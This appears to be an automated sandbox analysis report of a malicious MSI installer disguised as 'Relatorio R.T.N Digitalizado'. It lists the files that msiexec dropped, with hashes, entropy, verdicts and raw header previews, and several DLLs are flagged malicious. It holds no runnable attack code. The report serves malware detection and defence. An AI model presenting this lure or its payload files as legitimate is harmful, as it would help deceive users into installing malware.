File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {BB4407C3-4E7B-444C-908C-2ED061F6B530}, Number of Words: 10, Subject: Relatorio R.T.N Digitalizado, Author: Relatorio R.T.N Digitalizado, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: ;1033, Comments: Relatorio R.T.N Digitalizado, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	3409408
Entropy (8bit):	6.622022994001013
Encrypted:	false
SSDEEP:	49152:uiDxGSFVtaNXAZK8tKk5ojmrhCMz5vk3ukDln/hFRFNUEekBZWsRkn4frUMXjDt3:HxMXA9Kknz5vquVsRe4frUMXjTY
MD5:	0E079DE8E9F5C8DF67E4E045797214F8
SHA1:	D7F79A99E513B70E18497DD5C049B180790E0FA3
SHA-256:	41D756C67066D30C6DEAAB2DE7ECB02B9E1EEE8E7EF41C4A9948E8549B2973DA
SHA-512:	BEFFAC32CB3E2E7CFDAE54977AEE8FEE662CDBA88B6CA57A4DE3EC471CFD2A7838C1FBB153F1FA935643289B104B794DF1D117CF7B191779E3EB3A586C346752
Malicious:	false
Preview:	......................>...................5...................................................................................................................I...J...K...L...M...N...O...P...Q...R...S...T...............................................................................................................................................................................................................................................................................................................................b...............%...7........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...5...2...3...4...8...6...?...B...9...:...;...<...=...>...Q...@...A...G...C...D...E...F...o...H...a...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`.......c...t...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...u.......v...w...x...y...z...

C:\Windows\Installer\MSI5548.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	780768
Entropy (8bit):	6.387720196228063
Encrypted:	false
SSDEEP:	12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
MD5:	573F5E653258BF622AE1C0AD118880A2
SHA1:	E243C761983908D14BAF6C7C0879301C8437415D
SHA-256:	371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
SHA-512:	DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI57F8.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	388064
Entropy (8bit):	6.407392408414975
Encrypted:	false
SSDEEP:	6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
MD5:	20C782EB64C81AC14C83A853546A8924
SHA1:	A1506933D294DE07A7A2AE1FBC6BE468F51371D6
SHA-256:	0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
SHA-512:	AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI58C4.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	388064
Entropy (8bit):	6.407392408414975
Encrypted:	false
SSDEEP:	6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
MD5:	20C782EB64C81AC14C83A853546A8924
SHA1:	A1506933D294DE07A7A2AE1FBC6BE468F51371D6
SHA-256:	0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
SHA-512:	AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI5962.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	388064
Entropy (8bit):	6.407392408414975
Encrypted:	false
SSDEEP:	6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
MD5:	20C782EB64C81AC14C83A853546A8924
SHA1:	A1506933D294DE07A7A2AE1FBC6BE468F51371D6
SHA-256:	0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
SHA-512:	AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI59EF.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	878560
Entropy (8bit):	6.452749824306929
Encrypted:	false
SSDEEP:	24576:QK8S3AccKkqSojmrhCMou5vk3Y+ukDln/hFRFNUEekB:QK8tKk5ojmrhCMz5vk3ukDln/hFRFNU0
MD5:	D51A7E3BCE34C74638E89366DEEE2AAB
SHA1:	0E68022B52C288E8CDFFE85739DE1194253A7EF0
SHA-256:	7C6BDF16A0992DB092B7F94C374B21DE5D53E3043F5717A6EECAE614432E0DF5
SHA-512:	8ED246747CDD05CAC352919D7DED3F14B1E523CCC1F7F172DB85EED800B0C5D24475C270B34A7C25E7934467ACE7E363542A586CDEB156BFC484F7417C3A4AB0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j{..............`.......`..W...<.......<.......<.......`.......`.......`..............>.......>.......>...............>.......Rich....................PE..L...}.`.........."!.........\|...........................................................@............................t...T........................N..............X}..p....................~.......}..@............................................text............................... ..`.rdata..............................@..@.data...\...........................@....rsrc................^..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI5FAD.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	780768
Entropy (8bit):	6.387720196228063
Encrypted:	false
SSDEEP:	12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
MD5:	573F5E653258BF622AE1C0AD118880A2
SHA1:	E243C761983908D14BAF6C7C0879301C8437415D
SHA-256:	371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
SHA-512:	DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI60A8.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	780768
Entropy (8bit):	6.387720196228063
Encrypted:	false
SSDEEP:	12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
MD5:	573F5E653258BF622AE1C0AD118880A2
SHA1:	E243C761983908D14BAF6C7C0879301C8437415D
SHA-256:	371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
SHA-512:	DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI6750.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	388064
Entropy (8bit):	6.407392408414975
Encrypted:	false
SSDEEP:	6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
MD5:	20C782EB64C81AC14C83A853546A8924
SHA1:	A1506933D294DE07A7A2AE1FBC6BE468F51371D6
SHA-256:	0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
SHA-512:	AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI67ED.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	780768
Entropy (8bit):	6.387720196228063
Encrypted:	false
SSDEEP:	12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
MD5:	573F5E653258BF622AE1C0AD118880A2
SHA1:	E243C761983908D14BAF6C7C0879301C8437415D
SHA-256:	371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
SHA-512:	DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI69A4.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	2504
Entropy (8bit):	5.687092660399541
Encrypted:	false
SSDEEP:	24:Igl7Zze+TwfQu6ldxdyswdn/G+dxdOq2wG+dMw0ZpUhdxdiYDhiSz+dMwRo+dxdU:Iu5RbJ95hYD8Sz9n1eqanQosrBCfdW
MD5:	A58801632DBD0EFC277A7BD73EC26303
SHA1:	B24431CF0C26D7B3B4E6862CA73558F5B166CFE4
SHA-256:	C5B3CDC760764C567953AC77AFB23C6AB4E76709959DD7368AD805F6B1939A42
SHA-512:	B8B637AB841BE4F745F9EDAA14F86EC4F610D5C3DE3400D10E757894DE763DC365C2255398F91F12890568BDFC3961341D77CA880213ED9E369331BC14D5F675
Malicious:	false
Preview:	...@IXOS.@.....@Lj%V.@.....@.....@.....@.....@.....@......&.{E40EA355-92E4-4931-B901-659CE50E5A7A}..Relatorio R.T.N Digitalizado..AOEI-LEHOLLZCZW.msi.@.....@.....@.....@........&.{BB4407C3-4E7B-444C-908C-2ED061F6B530}.....@.....@.....@.....@.......@.....@.....@.......@......Relatorio R.T.N Digitalizado......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{A79610FE-54C3-458A-B94E-BD8C27ADA02F}[.C:\Users\user\AppData\Roaming\Relatorio R.T.N Digitalizado\Relatorio R.T.N Digitalizado\.@.......@.....@.....@......&.{6959BDEE-9B16-4294-84EA-0854CE48DA3B}P.01:\Software\Relatorio R.T.N Digitalizado\Relatorio R.T.N Digitalizado\Version.@.......@.....@.....@......&.{707E90D8-A51C-4CB8-ADB3-252AD031B13E}^.01:\Software\Relatorio R.T.N Digitalizado\{E40EA355-92E4-4931-B901-659CE50E5A7A}\AI_IA_ENABLE.@.......@.....@.....@........CreateFolders..Creating folders..Fold

C:\Windows\Installer\MSI6D02.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	780768
Entropy (8bit):	6.387720196228063
Encrypted:	false
SSDEEP:	12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
MD5:	573F5E653258BF622AE1C0AD118880A2
SHA1:	E243C761983908D14BAF6C7C0879301C8437415D
SHA-256:	371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
SHA-512:	DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{E40EA355-92E4-4931-B901-659CE50E5A7A}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1668433961931752
Encrypted:	false
SSDEEP:	12:JSbX72Fj9AGiLIlHVRp+h/7777777777777777777777777vDHFwiAQwSpOt/p1z:JDQI5WbAUF
MD5:	889273163D7CD83A97B6BCA100DE6487
SHA1:	6AD958C9D864CFF8BADF4CF5E35CEF23E5CEE610
SHA-256:	6B9C7987612BC3A4682A795836C50ADAB5DA75C9B959C45D3305DAC87D8CFECA
SHA-512:	11A4728AB7548374DDB4DA596DC7A5FADD04ED02BF77D33762228B71FB196669A30FCE13022D139670AFA3CBCACE6E9B173FF73DF09531C0540D3A4E8A3F532E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	1.8851591642676353
Encrypted:	false
SSDEEP:	48:P8Ph0uRc06WXJujT5LGtTpeayVBSKyV/AEKgCyc8k78xqo8x4swXGcp4ru2xBxYp:Oh01FjT8nA1kCuk87K4GcJ
MD5:	F3F6FBADA48C313644CA8AAD223FDB25
SHA1:	BB1EA022B4982ABBA2A3F4A011366769975A0E35
SHA-256:	12C703D8181BDA94CEABA4FB4903889DDC521908C214F737208579D8CBA97485
SHA-512:	9E01E36644D82ABA18A3D94B77D3E95CF9083653EB71574B27941CD6B09A2C07840C7E90EB921C63DA1F75462F0FFE2BCDEA40F744042B414C460DFF8516E1CA
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	192827
Entropy (8bit):	5.391998722520564
Encrypted:	false
SSDEEP:	3072:iHHJCoX5CNWFHjkzRl1pqf5JjzH6wbxygaK8Nkv6kF8Kwu8K8uBD556GIlZZ6bFy:i0LVlAg
MD5:	E745835AD2F0361B0E4B7D119F3FABF9
SHA1:	5CF11979354EBB668C8D5BE2673C3728A3E01B8A
SHA-256:	EB7C2AE0AC501285BE1CDF2CE9CCE49B6C7C636F2740A8B216D959D932736FA2
SHA-512:	30F5769557A2901F2E2A8AC6F9BFBDE15372D5FDF41F19313E693BF3CAC0BCA7399FC3B0EF846D474400865EE681D51878BCF7F57A5FE9C928E0D57C4BD1F24E
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N

C:\Windows\Temp\~DF0E3F5468B0217E2F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF0FDF9FBD36BFA2BD.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF224E2BD8DAE298BF.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3E6E3E13BB77688F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4BBE3CE30128CBBB.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8CCE9E8DE10CB2F5.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	1.2339058027411036
Encrypted:	false
SSDEEP:	48:5Ql8uaGI+CFXJJT55UVy/GtTpeayVBSKyV/AEKgCyc8k78xqo8x4swXGcp4ru2xq:K8XhT38VnA1kCuk87K4GcJ
MD5:	042DAFA9CB0B67C7FC88A3F0FFAF50D0
SHA1:	F9C30BBD2A26E9DF3776E2E2CF2BA20F08274DC9
SHA-256:	E074CF0EE7F61DD7A6859D9CF9117FA252D8A32BF153AF80260C7D7D5732EE9E
SHA-512:	B407E4A3EB4120E7468B1902FFB6ABF16A3ABDC9624727161FC6E27671180950293C112BC899385357D607465C51B1499AF50D7DFF83117E89E1AE4106F16516
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA45F0FBB0F3AC975.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	1.8851591642676353
Encrypted:	false
SSDEEP:	48:P8Ph0uRc06WXJujT5LGtTpeayVBSKyV/AEKgCyc8k78xqo8x4swXGcp4ru2xBxYp:Oh01FjT8nA1kCuk87K4GcJ
MD5:	F3F6FBADA48C313644CA8AAD223FDB25
SHA1:	BB1EA022B4982ABBA2A3F4A011366769975A0E35
SHA-256:	12C703D8181BDA94CEABA4FB4903889DDC521908C214F737208579D8CBA97485
SHA-512:	9E01E36644D82ABA18A3D94B77D3E95CF9083653EB71574B27941CD6B09A2C07840C7E90EB921C63DA1F75462F0FFE2BCDEA40F744042B414C460DFF8516E1CA
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA5C81456786AA235.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.32650401522955297
Encrypted:	false
SSDEEP:	48:WkJVpRT2yVBSKyVoyVBSKyV/AEKgCyc8k78xqo8x4swXGcp4ru2xBxYxMxqxrxbO:1/u1kCuk87K4G8P
MD5:	52CAC1F5DC73B240E16C1F4BC887BD0B
SHA1:	945DE6BCD3E86B7880FF195B0E6C1D210BCFDE5C
SHA-256:	2587471D9602928670CE66B6120D61CFE742F9845402F3BB9A9F7952A93CC3A1
SHA-512:	CD579A2826B13D1BB28F58A854CBA95AD7432E7AA74721DEC29CE55BA2A32C9FF3E5F92D75E9B7A874B950770351EA2CCE54D4C700D3BFDB76BF78372A0918C6
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBCF421C9ECEA957C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	1.8851591642676353
Encrypted:	false
SSDEEP:	48:P8Ph0uRc06WXJujT5LGtTpeayVBSKyV/AEKgCyc8k78xqo8x4swXGcp4ru2xBxYp:Oh01FjT8nA1kCuk87K4GcJ
MD5:	F3F6FBADA48C313644CA8AAD223FDB25
SHA1:	BB1EA022B4982ABBA2A3F4A011366769975A0E35
SHA-256:	12C703D8181BDA94CEABA4FB4903889DDC521908C214F737208579D8CBA97485
SHA-512:	9E01E36644D82ABA18A3D94B77D3E95CF9083653EB71574B27941CD6B09A2C07840C7E90EB921C63DA1F75462F0FFE2BCDEA40F744042B414C460DFF8516E1CA
Malicious:	false
